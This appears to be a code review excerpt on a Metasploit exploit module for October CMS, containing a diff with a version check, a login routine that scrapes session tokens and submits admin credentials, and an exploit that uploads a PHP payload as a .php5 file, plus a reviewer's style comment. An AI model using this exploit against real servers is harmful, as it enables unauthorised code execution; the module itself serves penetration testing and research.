modules/exploits/multi/http/october_upload_bypass_exec.rb

```diff
@@ -0,0 +1,159 @@
+        OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']),
+        OptString.new('PASSWORD', [ true, "Password to authenticate with", 'admin'])
+      ])
+  end
+
+  def uri
+    return target_uri.path
+  end
+
+  def check
+    begin
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(uri, '/modules/system/assets/js/framework.js')
+      })
+    rescue
+      vprint_error('Unable to access the /assets/js/framework.js file')
+      return CheckCode::Unknown
+    end
+
+    if res.code == 200
+      return Exploit::CheckCode::Appears
+    end
+
+    return CheckCode::Safe
+  end
+
+  def login
+    res = send_request_cgi({
+      'uri' => normalize_uri(uri, '/backend/backend/auth/signin'),
+      'method' => 'GET',
+    })
+
+    # Grabbing Session Key and token from body
+    /name="_session_key" type="hidden" value="(?<session>[A-Za-z0-9"]+)">/ =~ res.body
+    fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine Session Key") if session.nil?
+
+    /name="_token" type="hidden" value="(?<token>[A-Za-z0-9"]+)">/ =~ res.body
+    fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine token") if token.nil?
+    vprint_good("Token for login : #{token}")
+    vprint_good("Session Key for login : #{session}")
+
+    cookies = res.get_cookies
+    vprint_status('Trying to Login ......')
+
+    # Send Creds with cookies.
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(uri, '/backend/backend/auth/signin'),
+      'cookie' => cookies,
+      'vars_post' => Hash[{
+        '_session_key' => session,
+        '_token' => token,
+        'postback' => '1',
+        'login' => datastore['USERNAME'],
+        'password' => datastore['PASSWORD']
+      }.to_a.shuffle],
+    })
+
+    fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request") if res.nil?
+
+    # if we redirect to core_welcome dan we assume we have authenticated cookie.
+    if res.code == 302
+      print_good("Authentication successful: #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
+      store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])
+      return cookies
+    else
+      fail_with(Failure::UnexpectedReply, "#{peer} - Authentication Failed :[ #{datastore['USERNAME']}:#{datastore['PASSWORD']} ]")
+    end
+  end
+
+
+  def exploit
+
+    cookies = login
+
+    #Payload
+    evil = "<?php #{payload.encode} ?>"
+    payload_name = "#{rand_text_alpha(8 + rand(5))}.php5"
+
+    # setup POST request.
+    post_data = Rex::MIME::Message.new
+    post_data.add_part("/", content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="path"')
+    post_data.add_part(evil, content_type = 'application/x-php', transfer_encoding = nil, content_disposition = "form-data; name=\"file_data\"; filename=\"#{payload_name}")  #payload
```

Comment:
This line is long enough as it is, and the comment offers no value.

```suggestion
    post_data.add_part(evil, content_type = 'application/x-php', transfer_encoding = nil, content_disposition = "form-data; name=\"file_data\"; filename=\"#{payload_name}")
```